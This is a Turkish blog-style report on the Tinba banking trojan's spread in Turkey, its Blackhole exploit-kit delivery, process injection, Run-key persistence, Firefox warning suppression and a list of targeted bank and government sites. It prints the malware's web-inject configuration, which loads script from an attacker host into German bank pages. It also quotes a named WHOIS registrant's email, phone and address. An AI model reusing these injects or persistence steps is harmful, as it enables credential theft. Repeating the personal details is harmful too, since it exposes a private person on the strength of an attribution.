Tehlikeli Tinba Virüsü - Dünya

Yaklaşık 20 kb boyutunda olan ünlü Blackhole suç yazılımlarından, Tinba, Türkiye’de 600.000 den fazla kullanıcıyı etkilemiştir. İsim olarak Tinba kelimesi “tiny” ve “bank.” sözcüklerinden gelmektedir ve Tinybanker” ve “Zusy” kötü niyetli yazılımı olarak bilinmektedir. Micro Trend Güvenlik Grubu, bu trojenin 4 aylık bir takip neticesinde Türkiye’ye odaklandığını keşfetmiştir. Aşağıdaki resim etkilenen bölgeleri göstermektedir. Araştırmalar değişken/farklı IP ler esas alınarak tespit edilmiştir. Saldırganlar, yetkisiz bankacılık işlemlerinde potansiyel büyük kayıplar oluşturarak Türkiye içersinde özellikle mali kurumları (bankalar, şirketler) hedef almaktadır. Blackhole Exploiti Uzun takipler sonucunda Tinba çetesinin, enfeksiyon sayısı giderek artmaktadır. İşin ilginç tarafı ise bu virüsü kapmış kullanıcıların Blackhole exploit kitini kullanıyor olmaları. Örneğin aşağıdaki gibi : hxxp://sondder.ws/data/ap2.php --> hxxp://sondder.ws/main.php?page=1a38e197e2c1e8a2     -->hxxp://sondder.ws/w.php?f=182b5&e=1 (Tinba MD5: b6991e7497a31fada9877907c63a5888) host’a ulaşıldığında Blackhole, kurbanın “Please wait page is loading..., iletisini almasını bekler. Bir çok siber suçlu Blackhole Exploit kit lerini bilgisayarlara enfeksiyon bulaştırmak ve otomatik olarak Botnete dahil etmek için kullanır. Not: http:// dizesi kasıtlı olarak hxxp:// olarak değişir. Tinba’ya Genel Bakış Tinba Trojan-banker olarak bilinen küçük bir dosyadır. Net trafiğinizi sniff ederek login bilgilerinizi ele geçirir ve tarayıcınıza yerleşir. Diğer bankerTrojanler gibi Man in the Browser (MiTB) yöntemini kullanır ve belirli web sayfalarının görünümünü değiştirerek enjeksiyon yapar. Amaç: 2 faktörlü kimlik doğrulamayı aşmak ve kredi kartı bilgileri gibi hassas verilere sahip etkilenmiş kullanıcıları kandırmak. Tinba, CSIS’in bugüne kadar karşılaştığı en küçük Trojan-banker olup, zararlı yazılımlar gruba girmektedir. 20 KB boyutundaki bu kod oldukça basit olup gelişmiş şifrelemeye sahip değildir. Tespit edilen örnekler, antivirüs sistemlerinin tesipitinin düşük olduğunu göstermektedir. Virüs çalıştırıldığında; antivirüslere yakalanmamak için gizlenebilen bir enjeksiyon başlatır. Bu enjeksiyon işlemi saklandığı yerde yeni bir bellek alanı oluşturmakta ve bu işlem “winver.exe” (Version Reporter Applet)’e enjekte edilmektedir. Sonuş olarak Windows Sistem Klasöründe geçerli bir dosya halini alır. Bunun yanında aynı zamanda"explorer.exe" ve "svchost.exe" dosyalarına da enjeksiyon yapmaktadır. Virüs çalışma esnasında 4 farklı kütüphane kullanmaktadır : ntdll.dll, advapi32.dl, ws2_32.dll, ve user32.dll. Ana bileşenler [%ALLUSERSPROFILE%]\\Application Data\\default directory’e kopayalanır. Bunlar bin.exe, cfg.dat, web.dat dosyalarından oluşmaktadır. bin.exe dosyası kayıt defterine run key olarak eklenir ve böylelikle sistem kapatıldığında/açıldığında kodlar çalışmaya başlar. Bu enjeksiyonlar winver.exe ye dahil edilir. Bu dosya system32 dizininde bulunmaktadır. Öncelikle bu kötü niyetli yazılım hali hazır çalışan explorer.exe’e enjekte edilir ya da svchost.exe’nin yeni bir kopyasını başlatır. Bu işlemler kötü niyetli yazılımları kullanıcılar için daha az şüpheli yapanlardan daha farklı bir yol izlemektedir. Bu sayede Virüs uzaktan bağlanma kapsamına girer ve etkilenmiş belleğe kısa bir sapma (geçici yol) yaparak orjinal giriş noktası üzerine yazar. Dosya görüntüsünün kalanı değiştirilmeden kalır. Virüs çalıştırıldığında ntdll.dll, advapi32.dll, ws2_32.dll, and user32.dll kütüphanlerini kullanmakta olduğunu yukarda belirtmiştik. Sistem açılıp kapatıldığında kayıt defterine aşağıdaki gibi bir anahatar eklemektedir. HKCU\\ Software\\Microsoft\\Windows\\CurrentVersion\\Run with the name “default.” Virüs çalıştırılabilir dosyanın geçerli yolunu kontrol etmektedir. %ALLUSERSPROFILE%\\Application Data\\default\\bin.exe yolundan farklı ise, kayıt defteri anahtarı oluşturmadan önce bu dizine kendini kopyalar. Firefox’da Uyarı Sayfasınaı Devre dışı Bırakma Tinba, Firefox potansiyel zararlı web sayfalarını ziyaret ettiğinizde uyarı sayfasını devredışı bırakmaktadır. Mozilla bu sayfayı “Firefox 3 or later contains built-in phishing and malware protection to help keep you safe online. These features will warn you when a page you visit has been reported as a Web forgery of a legitimate site (sometimes called “phishing” pages) or as an attack site designed to harm your computer (otherwise known as malware).” olarak tanımlamaktadır. Çünkü virüs bu uyarı kapatmaktadır. Mozilla, İçeriği %SystemDrive%\\Documents and Settings\\All Users\\Application Data\\Mozilla\\Firefox\\Profiles\\[USER PROFILE NAME]\\user.js içeriğinin user_pref("security.warn_submit_insecure",false);user_pref("security.warn_viewing _mixed",false).” olarak değiştirildiği Firefox kurulum klasöründe arama yaparak gerçekleştirir. Bağlantıları Tinba, kendi bağlantılarını korumak için RC4 şifreleme algoritmasını kullanmaktadır. Bugüne kadar CSIS ve Trend Micro default_password ve wer8c7ygbw485ghw gibi 4 ten fazla birbirinden farklı şifreyi tanımlamıştır. Tinba Hedefleri Tinba’nın gömülü bir varsayılan yapılandırması mevcuttur. [urlfilter] https://* P !*microsoft.* GP !*google.* GP *accounts.google.*/ServiceLoginAuth* P !*facebook.* GP *facebook.*/login.php* P !*onlinechat.gmx.* GP *service.gmx.*/cgi/login* P [end] Bu varsayılan yapılandırma Google, Facebook, Microsoft, ve GMX gibi çevrim içi hizmetlerde login bilgilerini çalmak için virüse talimat vermektedir. Bunun yanında tüm HTTPS loglarını kaydetmektedir. Bunlara ilave olarak ek domain lerde yapılandırmada tanımlanmıştır: set_url https://kunde.comdirect.de* GP data_before <bOdy data_end data_inject style="visibility:hidden" data_end data_after data_end data_before data_end data_inject https://lorenzoonavio.com/trade/comcort data_end data_after /ccf/modules/js/cp_core.module.js data_end data_before </bOdy> data_end data_inject <script type="text/javascript" src= "https://lorenzoonavio.com/trade/comcort/script.js"></script> data_end data_after </html> data_end set_url https://banking.dkb.de/dkb/* PG data_before </bOdy> data_end data_inject <script src= "https://lorenzoonavio.com/trade/dakort/script.js"> </script> data_end data_after </html> data_end data_before <bOdy data_end data_inject style="visibility:hidden" data_end data_after data_end data_before <script type="text/javascript">Form_hookup(’login’);</script> data_end data_inject </form> <script type="text/javascript"> data_end data_after function refreshAnimation() data_end data_before } ); data_end data_inject data_end data_after </script> data_end Bunların yanında aşağıdaki domainler de en çok hedef alanlar arasında yer almaktadır. 63146 https://medeczane.sgk.gov.tr 26954 https://www.facebook.com 21708 https://fb-client.family.zynga.com 18754 https://fv-zprod.farmville.com 13641 https://isube.garanti.com.tr 10431 https://login.live.com 7486 https://oss-content.securestudies.com 6741 https://www.castrolfilozof.com 6326 https://www.e-icisleri.gov.tr 6322 https://www.isbank.com.tr 6270 https://www-bpt2.wiiings.com 6175 https://etopup.vodafone.com.tr 5147 https://cafeland.gamegos.net 4432 https://acikdeniz.denizbank.com 4057 https://medeczane2.sgk.gov.tr 3598 https://bar-navig.yandex.ru 3506 https://maps.googleapis.com 3244 https://pharmcash.com 3235 https://internetsube.turkiyefinans.com.tr 3093 https://baymsg1010727.gateway.messenger.live.com 2943 https://twitter.com 2800 https://esube1.ziraatbank.com.tr 2798 https://fb.bubble.zynga.com 2588 https://acente.flypgs.com 2494 https://mebbis.meb.gov.tr En çok skor, kamu hizmetleriyle yapılan bağlantılarda Türkiye’deni girişlerdir. Bununla birlikte Türkiye dışından yapılan girişlere izin verilmemektedir. CSIS ve Trend Micro bu siber suçlulara yönelik tespit ettikleri bir domaine (monolitabuse.com) Whois de incelediklerinde : Registrant Contact: Irina Uchaykina admin@monolitabuse.com +74959284906 fax: +74959284906 Ul. Ryazanskiy Prospekt, dom 27, kv. 89 Moscow Moscovskaya oblast 103928 ru Yukarıdaki kayda ulaşmaktadırlar. Whois veritabanında Irina Uchaykina’nın minimum 34 kayıtlı domaini olduğunu belirlemişlerdir. areuirbgeuihrweiufhey.com kipolkas3253.net sabmadelon.com unendingnight.com bertoilsdf243.com memory3.org saintrobots.com univerce-hosting.com coolmoroco.com mitworkidekwimm.net serf654.com ureuirbgeuihrweiufhey.com dakotawersvoipas.com monolitabuse.com sevenltddrivers.net vfr4455.com dshfauhi8izykdnkzx.com networkingoutmix.net sitelogodesign.com wwreuirbgeuihrweiufhey.com fertipeoteovereoner.com newdomaino.com statisticlub.net xartcollect.com hosto-master.com nologo0094.net teerg.com zvnurhidkfijfkdfkddfdsdsgyh.com ilbrnd.com nologo1093.com tegusigalpanebil.com unendingnight.com ioewjhfdhduiusfh.com reezz.com tyui89.com univerce-hosting.com

Posted in: dünya,Hacker,Korsan pc,Tehdit,Tehlikeli,Tinba,Virüsü